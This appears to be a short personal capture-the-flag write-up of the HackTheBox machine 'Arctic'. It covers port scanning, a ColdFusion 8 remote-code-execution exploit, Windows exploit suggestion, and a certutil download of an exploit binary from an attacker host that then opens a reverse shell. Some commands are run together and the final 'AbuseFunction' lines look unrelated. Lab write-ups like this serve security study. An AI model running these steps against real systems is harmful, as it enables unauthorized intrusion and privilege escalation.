nmap says we have 8500 unknown running.
We go there and check, it’s something called CFIDE.
Google it, there’s a vulnerability on Rapid7
We know it’s CF8 so we Google specific version + “exploit” we get one:
how to use:
python3 AdobeCF8RCE.pyFrom shell:
Steps/tools I forgot:
taking systeminfo:
systeminfoand running it through suggester:
cd /home/kali/wesng./wes.py /home/kali/Desktop/HackTheBox/Arctic/systeminfo.txt We get 200+!
To grep for just Elevation:
grep -B 7 -A 1 'Elevation'navigate to user folder:
cd c:\users\tolis
certutil -urlcache -f http://10.10.14.13:6999/Chimichurri.exe Chimichurri.exe
Chimichurri.exe 10.10.14.13 5555
We can check if we can impersonate admin
whoami /privHow to use an AbuseFunction:
write whatever is right after the ‘:’ like:
AbuseFunction: H5a-H5o
#would be
H5a-H5o